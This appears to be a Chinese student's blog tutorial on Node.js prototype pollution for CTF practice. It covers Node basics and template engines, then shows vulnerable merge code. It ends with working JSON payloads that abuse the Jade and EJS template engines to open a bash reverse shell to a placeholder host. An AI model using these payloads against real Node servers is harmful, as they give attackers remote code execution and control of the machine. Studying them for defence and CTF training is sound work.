🎼个人主页:金灰
😎作者简介:一名简单的大一学生;易编橙·终身成长社群的嘉宾.✨
专注网络空间安全服务,期待与您的交流分享~
感谢您的点赞、关注、评论、收藏、是对我最大的认可和支持!❤️
🍊易编橙·终身成长社群🍊 : http://t.csdnimg.cn/iSLaP 期待您的加入~
免责声明:本文仅做分享~
目录
Node介绍
发展
Node常见的模板:
原型污染原理:
调试配置:(vscode)
例
jade模板污染链:
ejs的模板污染:
Node介绍
Node.js发布于2009年
Chrome V8引擎下的JavaScript运行环境
JavaScript js xx.js
Java
两者的关系,就和雷锋与雷峰塔的关系一样.
jquery VUE (前端框架)
Chrome V8 深入支持JavaScript运行环境.
js只能操作 浏览器页面内的内容.
dom h1 table form
event 事件监听 --左键 右键 滑块 双击 跳转 异步请求 ajax
发展
围绕页面,设计时,为了安全,js无法-->
1 调用操作系统api (没有办法弹出计算器)
2 访问操作系统的文件系统,最多是操作Cookie ,解决xss问题,HttpOnly 防止js钓鱼
原因就是js代码,由服务端发送给浏览器执行.
如果能够操作系统api和访问文件系统,那么只要访问含义恶意的js代码的网址.
就会执行本地的命令,明显,不合乎逻辑!
浏览器也是建立 沙箱环境 来执行js,目前已经极难看到js能够直接调用本地客户端的 api 或者 执行命令.
除IE浏览器,
js发展到后面,也就执行页面上的操作,不能执行其他操作.
js作为前端渲染用,不可或缺.
再用v8引擎增加功能,让js能够操作操作系统api和访问文件系统,
那么js也就可以作为后端,http服务器,处理逻辑问题了
-->
结果,前后端都用的js
--2个人干的活,现在只需要1个人干
node -v # 安装成功>
npm -v # 扩展版本 pip
Node常见的模板:
express 渲染模板 --与 render_template 有点类似
Pug --旧版叫jade jade
Mustache
EJS
--处理数据如何附加到html页面上用的.
(插入数据的地方,写个标记,别人替换的时候,找这个标记,然后替换它对应的值.)
这个标记就是模板语法.
jade的模板 #{username}
ejs的模板语法 <%=usenrame %>
--告诉引擎,要把什么标记替换为什么数据.
原型污染原理:
子类通过__proto__执行父类,可以给父类增加没有的属性.
例:
var flag='flag_here';
var secert = {};
var sess = req.session;
let user = {};
utils.copy(user,req.body);
if(secert.ctf==='36dboy'){
res.end(flag);
}else{
return res.json({ret_code: 2, ret_msg: '登录失败'+JSON.stringify(user)});
}
污染--->
发包时json格式.
object
{"username":"admin","password":"123123",
"__proto__":{
"ctf":"36dboy"
}
}
本来object对象没有ctf属性.
通过user对象执行父类的__proto__属性,拿到了object对象的引用,
然后给object对象 增加了一个ctf属性,赋值为了36dboy.
然后,当访问secret对象的ctf属性时,由于自己没有ctf属性.
就去父类也就是object类去找secret,刚好有,就拿出来用了.
调试配置:(vscode)
{
// 使用 IntelliSense 了解相关属性。
// 悬停以查看现有属性的描述。
// 欲了解更多信息,请访问: https://go.microsoft.com/fwlink/?linkid=830387
"version": "0.2.0",
"configurations": [
{
"type": "node",
"request": "launch",
"name": "Launch Program",
"skipFiles": [
"<node_internals>/**"
],
"program": "${workspaceFolder}\\app\\app2.js"
}
]
}
例
关键代码(附件):
var user = new function(){
this.userinfo = new function(){
this.isVIP = false;
this.isAdmin = false;
this.isAuthor = false;
};
};
utils.copy(user.userinfo,req.body);
if(user.userinfo.isAdmin){
return res.json({ret_code: 0, ret_msg: '登录成功'});
}else{
return res.json({ret_code: 2, ret_msg: '登录失败'});
}
抓包-->
jade模板污染链:
{
"__proto__": {
"__proto__": {
"type": "Block",
"nodes": "",
"compileDebug": 1,
"self": 1,
"line": "global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/your-shell.com/3389 0>&1\"')"
}
}
}
我们通过原型污染,修改了模板的某个属性的值.
然后模板引用里面的字符串,实现了Node js的代码执行.
ejs的模板污染:
{"__proto__":{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/xxx/4567 0>&1\"');var __tmp2"}}}
{"__proto__":{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/your-shell.com/3389 0>&1\"');var __tmp2"}}}
(污染错就必须重置环境,,,,)